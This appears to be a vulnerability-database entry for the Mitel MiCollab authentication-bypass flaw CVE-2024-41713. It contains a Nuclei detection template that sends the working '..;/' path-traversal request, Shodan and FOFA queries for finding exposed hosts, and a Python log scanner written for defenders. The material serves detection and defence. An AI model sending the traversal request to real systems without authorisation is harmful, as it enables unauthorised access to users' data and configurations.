Mitel MiCollab vulnerability allows unauthorized access via authentication bypass, risking data integrity.
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
Cvelist | CVE-2024-35286 | 21 Oct 2024 00:00 | – | cvelist |
Cvelist | CVE-2024-41713 | 21 Oct 2024 00:00 | – | cvelist |
GithubExploit | Exploit for Path Traversal in Mitel Micollab | 11 Jan 2025 02:39 | – | githubexploit |
GithubExploit | Exploit for Path Traversal in Mitel Micollab | 5 Dec 2024 06:13 | – | githubexploit |
Vulnrichment | CVE-2024-35286 | 21 Oct 2024 00:00 | – | vulnrichment |
Vulnrichment | CVE-2024-41713 | 21 Oct 2024 00:00 | – | vulnrichment |
NVD | CVE-2024-35286 | 21 Oct 2024 21:15 | – | nvd |
NVD | CVE-2024-41713 | 21 Oct 2024 21:15 | – | nvd |
OpenVAS | Apache Axis2 Detection (HTTP) | 20 Sep 2010 00:00 | – | openvas |
OpenVAS | Directory Scanner | 3 Nov 2005 00:00 | – | openvas |
```yaml
id: CVE-2024-41713

info:
  name: Mitel MiCollab - Authentication Bypass
  author: DhiyaneshDK,watchTowr
  severity: high
  description: |
    A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41713
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.12006
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,cmg-suite,auth-bypass

http:
  - raw:
      - |
        GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022071c2e0cacae9ddccb1def297ab46e88b91dc5ff1f5f3d05c8f2181e5070d23e2022062a66764361eca00011f8568ae9df5c05a3e47bcc30221e27fc52dff54ad76b3:922c64590222798bb761d5b6d8e72950
```
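The template's request depends on a `..;/` path segment, which gives defenders a log-side indicator to hunt for. The following is an added example, not part of the template or of this page's original content: it scans web access logs for that segment, including percent-encoded forms. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed log layout: combined log format, i.e. ip ... "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e%3b and double-encoded forms are caught."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_semicolon_traversal(target):
    """True if a path segment is '..' carrying a ';' path parameter ('..;', '..;x=1')."""
    path = decode_fully(target.split("?", 1)[0])  # the query string is not a path
    return any(";" in seg and seg.split(";", 1)[0] == ".." for seg in path.split("/"))

def scan(lines):
    """Return (ip, status, target) for every logged request with a '..;' segment."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_semicolon_traversal(m["target"]):
            hits.append((m["ip"], int(m["status"]), m["target"]))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [05/Dec/2024:06:13:00 +0000] "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Dec/2024:06:13:02 +0000] "GET /npm-pwg/%2e%2e%3b/axis2-AWC/services/listServices HTTP/1.1" 404 310',
    '203.0.113.9 - - [05/Dec/2024:06:14:10 +0000] "GET /index.html?a=..;/x HTTP/1.1" 200 2048',
    '203.0.113.9 - - [05/Dec/2024:06:15:00 +0000] "GET /portal/;jsessionid=ABC123/home HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, target in scan(SAMPLE):
        # A 200 corresponds to the template's status matcher, so triage those first.
        label = "REVIEW" if status == 200 else "probe"
        print(f"{label:6} {ip} {status} {target}")
```

Ordinary path parameters such as `;jsessionid=` and `..;` inside a query string are not flagged, which keeps the hit list limited to requests shaped like the one in the template.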